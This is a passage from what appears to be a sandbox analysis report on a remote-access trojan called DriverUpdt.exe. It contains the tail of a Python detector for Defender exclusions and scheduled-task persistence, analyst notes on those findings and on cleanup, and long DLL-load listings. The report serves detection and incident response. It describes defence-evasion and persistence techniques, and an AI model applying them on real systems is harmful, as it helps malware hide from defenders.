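            target = (t.group(1) or t.group(2)).strip() if t else ""
            reasons = []
            if TASK_RL_RE.search(cmdline):
                reasons.append("highest run level")
            mm = TASK_MINUTE_RE.search(cmdline)
            if mm and int(mm.group(1)) <= 5:          # assumed threshold: <= 5 min is a watchdog
                reasons.append(f"re-launch every {mm.group(1)} min")
            if USER_WRITABLE_RE.search(target):
                reasons.append("target under user profile")
            if reasons:
                sev = "high" if len(reasons) >= 2 else "medium"
                findings.append(Finding("schtasks_persistence", parent, target, sev, "; ".join(reasons)))
                task_targets.append(target)
    # Correlation: the path just excluded from Defender is the persistence target.
    for target in task_targets:
        if target.lower() in exclusions:
            findings.append(Finding("exclusion_covers_persistence", exclusions[target.lower()],
                                    target, "critical", "excluded path equals task action"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.rule:28} {f.value}  {f.detail}  (parent: {f.parent})")
```

On the report's rows this yields four high-severity exclusion findings, one high-severity task finding (three reasons: highest run level, one-minute repeat, target under the user profile) and one critical correlation, while the control event from explorer.exe produces nothing. Note that `-ExclusionProcess` takes a bare process name, so the second and fourth rows exclude anything named DriverUpdt.exe or DriverUpdt regardless of path; a cleanup must remove all four entries with `Remove-MpPreference`, not only the path entries.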
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\DriverUpdt.exe | Section loaded: winmm.dll
Note: avicap32.dll and msvfw32.dll are the legacy Video for Windows capture libraries and winmm.dll is the multimedia (audio) API; a RAT loading them alongside the WinHTTP/DNS networking stack is consistent with webcam and microphone capture capability, and wbemcomn.dll is the WMI client library used for the hardware and security-product queries recorded elsewhere in this report.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
